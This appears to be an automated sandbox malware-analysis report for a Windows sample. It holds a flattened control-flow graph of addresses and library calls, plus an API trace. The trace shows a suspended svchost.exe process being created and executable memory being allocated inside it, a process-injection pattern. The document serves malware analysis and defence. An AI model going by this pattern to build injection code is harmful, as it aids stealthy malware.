17390 408bf20 17391 408bf30 17390->17391 17392 408c04a LoadLibraryA 17391->17392 17396 408c08f VirtualProtect VirtualProtect 17391->17396 17393 408c061 17392->17393 17393->17391 17395 408c073 GetProcAddress 17393->17395 17395->17393 17398 408c089 ExitProcess 17395->17398 17397 408c0f4 17396->17397 17397->17397 17441 401422a 17447 4013f63 codecvt _memcmp _strlen 17441->17447 17443 4013f75 17444 4013f50 __VEC_memcpy 17444->17447 17445 4006ca0 __VEC_memcpy _realloc 17445->17447 17447->17443 17447->17444 17447->17445 17448 4010d70 17447->17448 17452 40111a0 17447->17452 17451 4010d7d _strlen 17448->17451 17449 4010d8f 17449->17447 17450 4006ca0 __VEC_memcpy _realloc 17450->17451 17451->17449 17451->17450 17454 40111ad _memcmp 17452->17454 17453 40111b9 17453->17447 17454->17453 17455 4006ca0 __VEC_memcpy _realloc 17454->17455 17455->17454 18546 4019fad 18556 4019a80 18546->18556 18549 4006ca0 _realloc __VEC_memcpy 18550 401a00a 18549->18550 18551 401a138 18550->18551 18552 401a0fb 18550->18552 18554 401a130 18551->18554 18555 4006ca0 _realloc __VEC_memcpy 18551->18555 18553 4019a80 __VEC_memcpy 18552->18553 18553->18554 18555->18554 18558 4019a8d _memset codecvt 18556->18558 18557 4019aab 18557->18549 18557->18554 18558->18557 18559 4006ca0 _realloc __VEC_memcpy 18558->18559 18559->18558 17460 401362f 17464 40135d4 codecvt std::_Iterator_base::_Iterator_base 17460->17464 17461 40135da 17462 401f9f0 __VEC_memcpy 17462->17464 17464->17461 17464->17462 17465 4015c60 17464->17465 17466 4015c79 codecvt std::_Iterator_base::_Iterator_base _strlen 17465->17466 17468 4015c7f __crtLCMapStringA_stat 17466->17468 17472 401f9f0 __VEC_memcpy 17466->17472 17473 4013f50 17466->17473 17480 4015360 17466->17480 17524 401f6b0 17466->17524 17528 401f7c0 17466->17528 17468->17464 17472->17466 17478 4013f63 codecvt _memcmp _strlen 17473->17478 17474 4013f75 17474->17466 17475 4013f50 __VEC_memcpy 17475->17478 17476 4006ca0 __VEC_memcpy _realloc 17476->17478 17477 40111a0 __VEC_memcpy 17477->17478 17478->17474 17478->17475 17478->17476 17478->17477 17479 4010d70 __VEC_memcpy 17478->17479 17479->17478 17504 401537b codecvt 17480->17504 17481 4015381 17481->17466 17484 4013d30 __VEC_memcpy 17484->17504 17487 401f9f0 __VEC_memcpy 17487->17504 17488 4015c60 __VEC_memcpy 17488->17504 17504->17481 17504->17484 17504->17487 17504->17488 17532 4013e40 17504->17532 17538 4014850 17504->17538 17543 40135c0 17504->17543 17548 4014460 17504->17548 17552 40137a0 17504->17552 17556 4013410 17504->17556 17560 40132e0 17504->17560 17565 4013130 17504->17565 17570 4012f90 17504->17570 17575 4012d20 17504->17575 17582 4012c80 17504->17582 17586 40122e0 17504->17586 17590 4012270 17504->17590 17594 4012200 17504->17594 17598 40123f0 17504->17598 17602 40129a0 17504->17602 17607 4012840 17504->17607 17612 40126b0 17504->17612 17617 4012470 17504->17617 17622 4012b90 17504->17622 17627 4015eb0 17504->17627 17632 4012b10 17504->17632 17636 4012360 17504->17636 17640 4012120 17504->17640 17644 4012040 17504->17644 17648 4015080 17504->17648 17653 4011e70 17504->17653 17657 4011d60 17504->17657 17661 4011c70 17504->17661 17665 4011b50 17504->17665 17669 4011a40 17504->17669 17673 4011930 17504->17673 17677 4011800 17504->17677 17681 40115c0 17504->17681 17687 4014780 17504->17687 17691 40144f0 17504->17691 17702 4014980 17504->17702 17708 4014a70 17504->17708 17527 401f6bd codecvt 17524->17527 17525 401f6d3 17525->17466 17526 4006ca0 __VEC_memcpy _realloc 17526->17527 17527->17525 17527->17526 17531 401f7cd codecvt 17528->17531 17529 401f7e3 17529->17466 17530 4006ca0 __VEC_memcpy _realloc 17530->17531 17531->17529 17531->17530 17536 4013e50 codecvt std::_Iterator_base::_Iterator_base _strlen 17532->17536 17533 4013e56 17533->17504 17534 4006ca0 _realloc __VEC_memcpy 17534->17536 17536->17533 17536->17534 17537 401f9f0 __VEC_memcpy 17536->17537 17713 40162d0 17536->17713 17537->17536 17541 4014860 codecvt std::_Iterator_base::_Iterator_base _strlen 17538->17541 17539 4014866 17539->17504 17540 4006ca0 _realloc __VEC_memcpy 17540->17541 17541->17539 17541->17540 17717 401fc90 17541->17717 17547 40135d4 codecvt std::_Iterator_base::_Iterator_base 17543->17547 17544 40135da 17544->17504 17545 4015c60 __VEC_memcpy 17545->17547 17546 401f9f0 __VEC_memcpy 17546->17547 17547->17544 17547->17545 17547->17546 17550 4014470 codecvt _memcmp _strlen 17548->17550 17549 4014476 17549->17504 17550->17549 17721 401f620 17550->17721 17555 401381b _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17552->17555 17553 4013821 __crtLCMapStringA_stat 17553->17504 17554 401fc90 __VEC_memcpy 17554->17555 17555->17553 17555->17554 17558 401342f _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17556->17558 17557 4013435 __crtLCMapStringA_stat 17557->17504 17558->17557 17559 401fc90 __VEC_memcpy 17558->17559 17559->17558 17563 40132f0 codecvt std::_Iterator_base::_Iterator_base _strlen 17560->17563 17561 40132f6 17561->17504 17562 4006ca0 _realloc __VEC_memcpy 17562->17563 17563->17561 17563->17562 17564 401fc90 __VEC_memcpy 17563->17564 17564->17563 17567 4013140 codecvt std::_Iterator_base::_Iterator_base _strlen 17565->17567 17566 4013146 17566->17504 17567->17566 17568 401ebc0 __VEC_memcpy 17567->17568 17569 401fc90 __VEC_memcpy 17567->17569 17568->17567 17569->17567 17573 4012fa0 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17570->17573 17571 4012fa6 17571->17504 17572 4006ca0 _realloc __VEC_memcpy 17572->17573 17573->17571 17573->17572 17574 401fc90 __VEC_memcpy 17573->17574 17574->17573 17580 4012d30 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17575->17580 17576 4012d36 17576->17504 17577 401ebc0 __VEC_memcpy 17577->17580 17579 4006ca0 _realloc __VEC_memcpy 17579->17580 17580->17576 17580->17577 17580->17579 17581 401fc90 __VEC_memcpy 17580->17581 17725 40228b0 17580->17725 17581->17580 17583 4012c9a std::_Iterator_base::_Iterator_base 17582->17583 17584 401fc90 __VEC_memcpy 17583->17584 17585 4012d06 __crtLCMapStringA_stat 17583->17585 17584->17583 17585->17504 17587 40122f0 std::_Iterator_base::_Iterator_base _strlen 17586->17587 17588 401fc90 __VEC_memcpy 17587->17588 17589 401234a 17587->17589 17588->17587 17589->17504 17591 4012280 std::_Iterator_base::_Iterator_base 17590->17591 17592 401fc90 __VEC_memcpy 17591->17592 17593 40122d1 17591->17593 17592->17591 17593->17504 17595 4012210 std::_Iterator_base::_Iterator_base 17594->17595 17596 401fc90 __VEC_memcpy 17595->17596 17597 4012261 17595->17597 17596->17595 17597->17504 17599 4012400 std::_Iterator_base::_Iterator_base _strlen 17598->17599 17600 401fc90 __VEC_memcpy 17599->17600 17601 401245a 17599->17601 17600->17599 17601->17504 17603 40129ba codecvt std::_Iterator_base::_Iterator_base 17602->17603 17604 4015c60 __VEC_memcpy 17603->17604 17605 4012afd __crtLCMapStringA_stat 17603->17605 17606 401fc90 __VEC_memcpy 17603->17606 17604->17603 17605->17504 17606->17603 17611 401285a codecvt std::_Iterator_base::_Iterator_base 17607->17611 17608 401fc90 __VEC_memcpy 17608->17611 17609 4015c60 __VEC_memcpy 17609->17611 17610 4012989 __crtLCMapStringA_stat 17610->17504 17611->17608 17611->17609 17611->17610 17615 40126ca codecvt std::_Iterator_base::_Iterator_base _strlen 17612->17615 17613 4015c60 __VEC_memcpy 17613->17615 17614 4012820 __crtLCMapStringA_stat 17614->17504 17615->17613 17615->17614 17616 401fc90 __VEC_memcpy 17615->17616 17616->17615 17621 401248a _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17617->17621 17618 401fc90 __VEC_memcpy 17618->17621 17619 4015c60 __VEC_memcpy 17619->17621 17620 401269d __crtLCMapStringA_stat 17620->17504 17621->17618 17621->17619 17621->17620 17625 4012baa codecvt std::_Iterator_base::_Iterator_base 17622->17625 17623 401fc90 __VEC_memcpy 17623->17625 17624 4015c60 __VEC_memcpy 17624->17625 17625->17623 17625->17624 17626 4012c6a __crtLCMapStringA_stat 17625->17626 17626->17504 17629 4015eca codecvt std::_Iterator_base::_Iterator_base 17627->17629 17628 401fc90 __VEC_memcpy 17628->17629 17629->17628 17630 4015c60 __VEC_memcpy 17629->17630 17631 4015f88 __crtLCMapStringA_stat 17629->17631 17630->17629 17631->17504 17634 4012b20 std::_Iterator_base::_Iterator_base _strlen 17632->17634 17633 401fc90 __VEC_memcpy 17633->17634 17634->17633 17635 4012b7a 17634->17635 17635->17504 17638 4012370 std::_Iterator_base::_Iterator_base _strlen 17636->17638 17637 401fc90 __VEC_memcpy 17637->17638 17638->17637 17639 40123e2 17638->17639 17639->17504 17641 4012130 std::_Iterator_base::_Iterator_base _strlen 17640->17641 17642 40121f1 17641->17642 17643 401fc90 __VEC_memcpy 17641->17643 17642->17504 17643->17641 17645 4012050 std::_Iterator_base::_Iterator_base _strlen 17644->17645 17646 401210e 17645->17646 17647 401fc90 __VEC_memcpy 17645->17647 17646->17504 17647->17645 17650 4015090 _memset codecvt std::_Iterator_base::_Iterator_base 17648->17650 17649 40150d7 17649->17504 17650->17649 17652 401fc90 __VEC_memcpy 17650->17652 17729 401f1c0 17650->17729 17652->17650 17654 4011ece _memset std::_Iterator_base::_Iterator_base _strlen 17653->17654 17655 401fc90 __VEC_memcpy 17654->17655 17656 4011ffa codecvt __crtLCMapStringA_stat 17655->17656 17656->17504 17659 4011d70 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17657->17659 17658 4011d78 17658->17504 17659->17658 17660 401fc90 __VEC_memcpy 17659->17660 17660->17659 17663 4011c80 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17661->17663 17662 4011c86 17662->17504 17663->17662 17664 401fc90 __VEC_memcpy 17663->17664 17664->17663 17668 4011b60 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17665->17668 17666 4011b66 17666->17504 17667 401fc90 __VEC_memcpy 17667->17668 17668->17666 17668->17667 17672 4011a50 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17669->17672 17670 4011a56 17670->17504 17671 401fc90 __VEC_memcpy 17671->17672 17672->17670 17672->17671 17674 4011963 _memset std::_Iterator_base::_Iterator_base _strlen 17673->17674 17675 401fc90 __VEC_memcpy 17674->17675 17676 4011a00 codecvt __crtLCMapStringA_stat 17675->17676 17676->17504 17678 4011810 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17677->17678 17679 401fc90 __VEC_memcpy 17678->17679 17680 4011926 17678->17680 17679->17678 17680->17504 17683 40115da _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17681->17683 17682 40115ff std::_Iterator_base::_Iterator_base 17684 401fc90 __VEC_memcpy 17682->17684 17683->17682 17685 4011641 __crtLCMapStringA_stat 17683->17685 17686 401fc90 __VEC_memcpy 17683->17686 17684->17685 17685->17504 17686->17683 17689 4014790 _strlen 17687->17689 17688 4014796 17688->17504 17689->17688 17690 40144f0 __VEC_memcpy 17689->17690 17690->17689 17695 4014500 codecvt std::_Iterator_base::_Iterator_base _strlen 17691->17695 17692 401450c 17692->17504 17693 40145f4 17737 401e8c0 17693->17737 17695->17692 17695->17693 17696 401fc90 __VEC_memcpy 17695->17696 17696->17695 17697 4014616 _memset 17698 401467b 17697->17698 17700 4006ca0 _realloc __VEC_memcpy 17697->17700 17701 4014692 codecvt 17697->17701 17699 4006ca0 _realloc __VEC_memcpy 17698->17699 17699->17701 17700->17698 17701->17504 17707 4014989 codecvt 17702->17707 17703 4014995 17703->17504 17705 401f620 __VEC_memcpy 17705->17707 17706 4006410 __VEC_memcpy 17706->17707 17707->17703 17707->17705 17707->17706 17741 4006620 17707->17741 17710 4014a79 17708->17710 17709 4014a85 17709->17504 17710->17709 17744 4006580 17710->17744 17749 4006410 17710->17749 17715 4016317 _memset 17713->17715 17714 4016320 _memset __crtLCMapStringA_stat 17714->17536 17715->17714 17716 4006ca0 _realloc __VEC_memcpy 17715->17716 17716->17715 17720 401fc9d codecvt 17717->17720 17718 401fca9 17718->17541 17719 4006ca0 __VEC_memcpy _realloc 17719->17720 17720->17718 17720->17719 17723 401f630 std::_Iterator_base::_Iterator_base 17721->17723 17722 401f690 17722->17550 17723->17722 17724 4006ca0 _realloc __VEC_memcpy 17723->17724 17724->17722 17726 402296c codecvt 17725->17726 17728 40228c0 17725->17728 17726->17580 17727 4006ca0 __VEC_memcpy _realloc 17727->17728 17728->17726 17728->17727 17731 401f1cd _memset codecvt 17729->17731 17730 401f1e5 17730->17650 17731->17730 17733 401f020 17731->17733 17735 401f02d _memset codecvt _strlen 17733->17735 17734 401f045 17734->17731 17735->17734 17736 4006ca0 __VEC_memcpy _realloc 17735->17736 17736->17735 17739 401e8cd 17737->17739 17738 401e8df 17738->17697 17739->17738 17740 4006ca0 _realloc __VEC_memcpy 17739->17740 17740->17739 17742 401efb0 __VEC_memcpy 17741->17742 17743 4006632 17742->17743 17743->17707 17745 401efb0 __VEC_memcpy 17744->17745 17746 4006590 17745->17746 17747 401f620 __VEC_memcpy 17746->17747 17748 40065a0 17747->17748 17748->17710 17750 4006420 std::exception::exception 17749->17750 17751 4006ca0 _realloc __VEC_memcpy 17750->17751 17752 4006455 codecvt 17751->17752 17752->17710 17798 40184af 17828 4017d27 std::_Iterator_base::_Iterator_base _strlen 17798->17828 17799 40186c9 17800 401fea0 __VEC_memcpy 17822 40185bd codecvt 17800->17822 17802 4017df5 17804 4017e18 17802->17804 17805 4017f4c 17802->17805 17825 4017d5a 17802->17825 17808 4017e37 17804->17808 17809 4017e96 17804->17809 17804->17825 17806 4017fd3 17805->17806 17807 4017f58 17805->17807 17810 40194d0 __VEC_memcpy 17806->17810 17816 4017f93 17807->17816 17821 401fea0 __VEC_memcpy 17807->17821 17807->17825 17812 4017e5e 17808->17812 17838 401fea0 17808->17838 17848 40194d0 17809->17848 17814 4017ffb 17810->17814 17842 40195c0 17812->17842 17823 401fea0 __VEC_memcpy 17814->17823 17814->17825 17817 40195c0 __VEC_memcpy 17816->17817 17817->17825 17821->17816 17822->17799 17824 4006410 __VEC_memcpy 17822->17824 17823->17825 17824->17799 17825->17799 17825->17800 17825->17822 17826 4017350 __VEC_memcpy 17826->17828 17827 401fea0 __VEC_memcpy 17827->17825 17828->17802 17828->17825 17828->17826 17829 401844f 17828->17829 17832 4017b40 __VEC_memcpy 17828->17832 17834 401ee80 17828->17834 17852 40060a0 17828->17852 17864 4024600 17828->17864 17868 4017740 17828->17868 17873 4017350 17829->17873 17832->17828 17836 401ee8d _strlen 17834->17836 17835 401eea2 17835->17828 17836->17835 17837 4006ca0 _realloc __VEC_memcpy 17836->17837 17837->17836 17839 401fecb _vwprintf 17838->17839 17840 401f9f0 __VEC_memcpy 17839->17840 17841 4020002 codecvt __crtLCMapStringA_stat 17840->17841 17841->17812 17843 40195da 17842->17843 17847 4019658 17842->17847 17845 401962d 17843->17845 17843->17847 17885 401a600 17843->17885 17846 4006410 __VEC_memcpy 17845->17846 17846->17847 17847->17825 17849 40194e0 17848->17849 17850 4017ebf 17849->17850 17851 4006ca0 _realloc __VEC_memcpy 17849->17851 17850->17825 17850->17827 17851->17849 17853 40060b0 17852->17853 17854 401efb0 __VEC_memcpy 17853->17854 17855 40060e1 17854->17855 17856 401efb0 __VEC_memcpy 17855->17856 17857 40060f5 17856->17857 17858 401efb0 __VEC_memcpy 17857->17858 17859 400610a 17858->17859 17860 401efb0 __VEC_memcpy 17859->17860 17861 400611f 17860->17861 17862 401f620 __VEC_memcpy 17861->17862 17863 4006133 17862->17863 17863->17828 17866 402460d 17864->17866 17865 4024619 17865->17828 17866->17865 17867 4015c60 __VEC_memcpy 17866->17867 17867->17866 17871 4017750 17868->17871 17869 401775b 17869->17828 17871->17869 17872 401fea0 __VEC_memcpy 17871->17872 17888 4020920 17871->17888 17872->17871 17876 4017360 17873->17876 17874 401736b 17874->17825 17878 4017b40 17874->17878 17876->17874 17877 401f9f0 __VEC_memcpy 17876->17877 17893 4020440 17876->17893 17877->17876 17883 4017b50 _memset codecvt 17878->17883 17879 4017b5b 17879->17825 17881 401f9f0 __VEC_memcpy 17881->17883 17883->17879 17883->17881 17884 401fc90 __VEC_memcpy 17883->17884 17897 40205e0 17883->17897 17901 4017230 17883->17901 17884->17883 17886 401efb0 __VEC_memcpy 17885->17886 17887 401a642 _strlen 17886->17887 17887->17845 17890 402093a _memset codecvt 17888->17890 17889 4020b6f __crtLCMapStringA_stat 17889->17871 17890->17889 17891 4006ca0 _realloc __VEC_memcpy 17890->17891 17892 4006410 __VEC_memcpy 17890->17892 17891->17890 17892->17890 17894 4020450 _memset codecvt 17893->17894 17895 4006ca0 _realloc __VEC_memcpy 17894->17895 17896 4020462 codecvt 17894->17896 17895->17894 17896->17876 17899 40205f0 codecvt 17897->17899 17898 4020608 17898->17883 17899->17898 17900 4006ca0 _realloc __VEC_memcpy 17899->17900 17900->17899 17904 4017240 _memset codecvt 17901->17904 17902 401724c 17902->17883 17903 401e8c0 __VEC_memcpy 17903->17904 17904->17902 17904->17903 18458 4018f70 18459 4018f7a codecvt 18458->18459 18461 4018faa 18459->18461 18462 401c930 18459->18462 18468 401c940 codecvt 18462->18468 18464 401c97a 18464->18459 18465 4023590 __VEC_memcpy 18465->18468 18466 4028060 __VEC_memcpy 18466->18468 18468->18464 18468->18465 18468->18466 18469 40267c0 18468->18469 18475 4024050 18468->18475 18473 40267cd _memset codecvt 18469->18473 18470 40255a0 __VEC_memcpy 18470->18473 18471 4024ae0 __VEC_memcpy 18471->18473 18472 40255c0 __VEC_memcpy 18472->18473 18473->18470 18473->18471 18473->18472 18474 40267df 18473->18474 18474->18468 18476 4024067 18475->18476 18477 402407f 18476->18477 18481 40245b0 18476->18481 18485 4024aa0 18477->18485 18482 40245c9 18481->18482 18484 40245e1 18482->18484 18488 4014fd0 18482->18488 18484->18477 18500 4024820 18485->18500 18489 4014ff2 18488->18489 18492 4014ae0 18489->18492 18491 4015075 18491->18484 18499 4014b55 codecvt std::_Iterator_base::_Iterator_base _strlen 18492->18499 18493 4014ea7 __crtLCMapStringA_stat 18493->18491 18494 401e730 __VEC_memcpy 18494->18499 18495 401f9f0 __VEC_memcpy 18495->18499 18496 401efb0 __VEC_memcpy 18496->18499 18497 401ebc0 __VEC_memcpy 18497->18499 18498 4020050 __VEC_memcpy 18498->18499 18499->18493 18499->18494 18499->18495 18499->18496 18499->18497 18499->18498 18503 4024830 codecvt std::_Iterator_base::_Iterator_base _strlen 18500->18503 18501 402409f 18501->18468 18502 401fc90 __VEC_memcpy 18502->18503 18503->18501 18503->18502 18504 4015c60 __VEC_memcpy 18503->18504 18509 40246a0 18503->18509 18514 40242c0 18503->18514 18522 40243f0 18503->18522 18530 4024180 18503->18530 18504->18503 18511 40246ba codecvt std::_Iterator_base::_Iterator_base _strlen 18509->18511 18510 40246de __crtLCMapStringA_stat 18510->18503 18511->18510 18512 4015c60 __VEC_memcpy 18511->18512 18513 401fc90 __VEC_memcpy 18511->18513 18512->18511 18513->18511 18515 4024330 18514->18515 18516 4006ca0 _realloc __VEC_memcpy 18515->18516 18517 40243a0 18516->18517 18518 4006ca0 _realloc __VEC_memcpy 18517->18518 18519 40243b7 18518->18519 18520 4006ca0 _realloc __VEC_memcpy 18519->18520 18521 40243d0 __crtLCMapStringA_stat 18520->18521 18521->18503 18523 4024460 18522->18523 18524 4006ca0 _realloc __VEC_memcpy 18523->18524 18525 40244d0 18524->18525 18526 4006ca0 _realloc __VEC_memcpy 18525->18526 18527 40244e7 18526->18527 18528 4006ca0 _realloc __VEC_memcpy 18527->18528 18529 4024500 __crtLCMapStringA_stat 18528->18529 18529->18503 18531 4024200 18530->18531 18532 4006ca0 _realloc __VEC_memcpy 18531->18532 18533 4024270 18532->18533 18534 4006ca0 _realloc __VEC_memcpy 18533->18534 18535 4024287 18534->18535 18536 4006ca0 _realloc __VEC_memcpy 18535->18536 18537 40242a0 __crtLCMapStringA_stat 18536->18537 18537->18503 17757 4023270 17760 4023276 codecvt 17757->17760 17758 402327c codecvt 17760->17758 17761 401f9f0 __VEC_memcpy 17760->17761 17763 4022b80 17760->17763 17767 401f8b0 17760->17767 17761->17760 17764 402305c codecvt __crtLCMapStringA_stat 17763->17764 17765 4022bb5 _memset codecvt 17763->17765 17764->17760 17765->17764 17766 4006ca0 _realloc __VEC_memcpy 17765->17766 17766->17765 17769 401f8bd codecvt 17767->17769 17768 401f8cf 17768->17760 17769->17768 17770 4006ca0 __VEC_memcpy _realloc 17769->17770 17770->17769 18144 4008cf2 18145 4008cfe 6 library calls 18144->18145 18152 400c4a5 18145->18152 18147 4008dac __setargv __amsg_exit __setenvp 18156 4009a9d 18147->18156 18149 4008dd9 __wincmdln __amsg_exit 18160 40210d0 18149->18160 18151 4008e05 __fcloseall 18153 400c4c3 __malloc_crt 18152->18153 18154 4006ca0 _realloc __VEC_memcpy 18153->18154 18155 400c4cb __fcloseall __malloc_crt 18153->18155 18154->18155 18155->18147 18157 4009aab __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 18156->18157 18159 4009ae8 __IsNonwritableInCurrentImage __initterm 18157->18159 18168 4007252 18157->18168 18159->18149 18161 40210e8 18160->18161 18189 4020e40 18161->18189 18163 402114a 18194 4021a50 18163->18194 18165 4021154 18166 40213ad codecvt __crtLCMapStringA_stat 18165->18166 18198 4019020 18165->18198 18166->18151 18171 4007216 18168->18171 18170 400725f 18170->18159 18172 4007222 __fcloseall __cinit 18171->18172 18175 400712b 18172->18175 18174 4007233 __fcloseall __cinit 18174->18170 18177 400713f __decode_pointer __msize 18175->18177 18176 4007191 18178 40071a7 __encode_pointer 18176->18178 18180 40098bd __realloc_crt __VEC_memcpy 18176->18180 18177->18176 18177->18178 18181 40098bd 18177->18181 18178->18174 18180->18178 18184 40098c6 18181->18184 18183 4009905 18183->18176 18184->18183 18185 400d4ce 18184->18185 18187 400d4da 7 library calls 18185->18187 18186 400d4e1 __fcloseall _realloc _malloc 18186->18184 18187->18186 18188 4006ca0 __VEC_memcpy _realloc 18187->18188 18188->18187 18192 4020e54 _strlen 18189->18192 18191 4020e7b codecvt 18191->18163 18192->18191 18193 4006ca0 __VEC_memcpy _realloc 18192->18193 18204 4021d30 18192->18204 18193->18192 18196 4021a6a _memset codecvt 18194->18196 18197 4021cf4 __crtLCMapStringA_stat 18196->18197 18210 4021460 18196->18210 18197->18165 18200 4019030 codecvt 18198->18200 18199 401903b 18199->18165 18200->18199 18201 4023970 __VEC_memcpy 18200->18201 18202 4017410 __VEC_memcpy 18200->18202 18203 4016980 __VEC_memcpy 18200->18203 18201->18200 18202->18200 18203->18200 18205 4021f18 codecvt 18204->18205 18209 4021d4b _memset 18204->18209 18205->18192 18206 4006ca0 __VEC_memcpy _realloc 18206->18209 18207 4006ca0 _realloc __VEC_memcpy 18207->18205 18208 4021efd 18208->18205 18208->18207 18209->18205 18209->18206 18209->18208 18212 4021477 _memset 18210->18212 18211 4021489 __crtLCMapStringA_stat 18211->18196 18212->18211 18213 4006ca0 _realloc __VEC_memcpy 18212->18213 18213->18212 18361 4028130 18362 402813f 18361->18362 18363 4007252 __cinit __VEC_memcpy 18362->18363 18364 4028149 18363->18364 18594 40233f0 18598 40233f6 codecvt 18594->18598 18595 40233fc 18596 401f620 __VEC_memcpy 18596->18598 18598->18595 18598->18596 18599 4026c40 18598->18599 18602 4026c7b codecvt std::_Iterator_base::_Iterator_base 18599->18602 18600 401f9f0 __VEC_memcpy 18600->18602 18601 4026cb6 codecvt __crtLCMapStringA_stat 18601->18598 18602->18600 18602->18601 18604 4022700 18602->18604 18605 4022717 18604->18605 18607 40227e6 codecvt 18604->18607 18606 4006ca0 _realloc __VEC_memcpy 18605->18606 18605->18607 18606->18607 18607->18602 17905 40014b3 17907 40014c2 17905->17907 17906 400161a 17907->17906 17908 4001430 QueryPerformanceCounter 17907->17908 17909 4001514 17908->17909 17910 4001430 QueryPerformanceCounter 17909->17910 17911 4001524 17910->17911 17912 4001160 7 API calls 17911->17912 17913 4001549 17912->17913 17914 400160d Sleep 17913->17914 17915 400155f 17913->17915 17914->17906 17916 40013b0 2 API calls 17915->17916 17917 4001572 lstrcat GetTickCount 17916->17917 17918 40010e0 2 API calls 17917->17918 17919 40015ad 17918->17919 17920 4001040 2 API calls 17919->17920 17921 40015ea closesocket 17920->17921 17921->17906 18214 40016f4 18215 400166f 18214->18215 18216 400167c WaitForSingleObject 18215->18216 18219 40016cc Sleep 18215->18219 18220 40016e5 SetEvent 18215->18220 18221 40016f6 CloseHandle Sleep 18215->18221 18223 4001735 18215->18223 18224 4001dc0 8 API calls 18215->18224 18217 40016a3 GetExitCodeProcess 18216->18217 18218 400168f TerminateProcess 18216->18218 18217->18215 18218->18223 18219->18215 18220->18223 18222 40023e0 32 API calls 18221->18222 18222->18215 18224->18215 17771 401b077 17772 401affe 17771->17772 17773 401b015 codecvt 17772->17773 17774 401b083 17772->17774 17781 401a890 17772->17781 17777 401cd80 17774->17777 17780 401cd90 codecvt 17777->17780 17778 401cda8 17778->17773 17779 4006ca0 _realloc __VEC_memcpy 17779->17780 17780->17778 17780->17779 17784 401a8b7 _memset codecvt _strnlen _strlen 17781->17784 17782 401a8cf codecvt __crtLCMapStringA_stat 17782->17772 17783 4006ca0 _realloc __VEC_memcpy 17783->17784 17784->17782 17784->17783 17786 401d100 17784->17786 17789 401d128 _memset 17786->17789 17787 401d142 codecvt __crtLCMapStringA_stat 17787->17784 17788 4006ca0 __VEC_memcpy _realloc 17788->17789 17789->17787 17789->17788 17790 4006410 __VEC_memcpy 17789->17790 17790->17789 17922 40190bd 17923 4019030 codecvt 17922->17923 17927 401903b 17923->17927 17928 4017410 17923->17928 17932 4016980 17923->17932 17936 4023970 17923->17936 17930 401742d 17928->17930 17931 401753f _memset 17930->17931 17952 4004d10 17930->17952 17931->17923 17933 4016987 17932->17933 17934 401698d 17933->17934 17935 4006410 __VEC_memcpy 17933->17935 17934->17923 17935->17933 17937 4023980 17936->17937 17938 401efb0 __VEC_memcpy 17937->17938 17939 40239f5 17938->17939 17940 4006ca0 _realloc __VEC_memcpy 17939->17940 17941 4023a6a 17940->17941 17956 40048c0 17941->17956 17943 4023ab4 17945 4023b21 17943->17945 17974 4004600 17943->17974 17947 4023b88 17945->17947 17984 40044b0 17945->17984 17949 4023bef 17947->17949 17990 4004b60 17947->17990 17950 4023c56 17949->17950 17951 4004d10 __VEC_memcpy 17949->17951 17950->17923 17951->17949 17953 4004d20 17952->17953 17954 401efb0 __VEC_memcpy 17953->17954 17955 4004d74 17954->17955 17955->17930 17957 40048d0 17956->17957 18000 401ef30 17957->18000 17960 401efb0 __VEC_memcpy 17961 4004921 17960->17961 17962 401efb0 __VEC_memcpy 17961->17962 17963 400494e 17962->17963 17964 401efb0 __VEC_memcpy 17963->17964 17965 4004963 17964->17965 17966 401efb0 __VEC_memcpy 17965->17966 17967 4004978 17966->17967 17968 401efb0 __VEC_memcpy 17967->17968 17969 400498d 17968->17969 17970 401efb0 __VEC_memcpy 17969->17970 17971 40049a2 17970->17971 17972 401efb0 __VEC_memcpy 17971->17972 17973 40049c3 17972->17973 17973->17943 17975 4004610 17974->17975 17976 401efb0 __VEC_memcpy 17975->17976 17977 400464c 17976->17977 17978 401efb0 __VEC_memcpy 17977->17978 17979 4004661 17978->17979 17980 401efb0 __VEC_memcpy 17979->17980 17981 4004676 17980->17981 17982 4006ca0 _realloc __VEC_memcpy 17981->17982 17983 40046b4 17982->17983 17983->17943 17985 40044c0 17984->17985 17986 401efb0 __VEC_memcpy 17985->17986 17987 40044fc 17986->17987 17988 401efb0 __VEC_memcpy 17987->17988 17989 4004535 17988->17989 17989->17945 17991 4004b70 17990->17991 17992 401efb0 __VEC_memcpy 17991->17992 17993 4004bac 17992->17993 17994 401efb0 __VEC_memcpy 17993->17994 17995 4004bc1 17994->17995 17996 401efb0 __VEC_memcpy 17995->17996 17999 4004bd6 17996->17999 17997 4004c53 17997->17947 17998 401efb0 __VEC_memcpy 17998->17999 17999->17997 17999->17998 18003 401ef3d 18000->18003 18001 400490c 18001->17960 18002 4006ca0 _realloc __VEC_memcpy 18002->18003 18003->18001 18003->18002

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 04001FA4
                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,\system32\svchost.exe), ref: 04001FB6
                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,0400317C), ref: 04001FCE
                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 04001FDF
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002057
                                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 04002090
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040020A5
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 040020CE
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,00000000,?,00103000,00000040), ref: 040020F7
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04002115
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04002122
